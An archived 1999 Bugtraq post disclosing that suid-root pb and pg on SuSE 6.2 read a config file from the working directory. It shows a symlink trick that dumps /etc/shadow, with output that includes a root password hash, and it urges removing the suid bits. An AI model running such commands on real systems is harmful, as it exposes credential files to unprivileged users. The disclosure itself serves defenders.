|
Bugtraq
mailing list archives
Two SuSE 6.2 local root exploits
From: btellier () WEBLEY COM (Brock Tellier)
Date: Thu, 16 Sep 1999 19:06:24 -0500
Greetings,
/usr/bin/pb and /usr/bin/pg, suid root by default on SuSE 6.2, allow
any user to read any file on the system as shown:
susebox:/root # ls -la /usr/bin/pb
uname -rwsr-xr-x 1 root root 23544 Jul 22 20:07 /usr/bin/pb
susebox:/root # strace /usr/bin/pb
...
personality(PER_LINUX) = 0
getpid() = 16623
brk(0) = 0x805032c
brk(0x80504cc) = 0x80504cc
brk(0x8051000) = 0x8051000
open("pb.conf", O_RDONLY) <-- trouble? = -1 ENOENT (No such file or
directory)
write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen: No such
file or directory
) = 41
_exit(1) = ?
susebox:/root #
---
xnec () susebox:/tmp > id
uid=1001(xnec) gid=100(users) groups=100(users)
xnec () susebox:/tmp > ln -s /etc/shadow ./pb.conf
xnec () susebox:/tmp > pb
Unknown config line : <root:nfpzNvX19GwRg:10850:0:10000::::> =
<bin:*:8902:0:10000::::>
Unknown config line : <daemon:*:8902:0:10000::::> =
<lp:*:9473:0:10000::::>
Unknown config line : <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::>
Unknown config line : <games:*:0:0:10000::::> = <man:*:8902:0:10000::::>
... etc for the entire shadow file
The same scenario for /usr/bin/pg's pg.conf in your cwd. These two
programs also contain numerous buffer overflows and other insecure file
i/o and should obviously lose their suid bits. They cannot operate
correctly without their s-bits unless they are run by root, but no one
besides root will run them anyway. These programs are not worth
patching.
Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com
 By Date 
By Thread
Current thread:
- Re: IE5 allows executing programs, (continued)
|
Intro
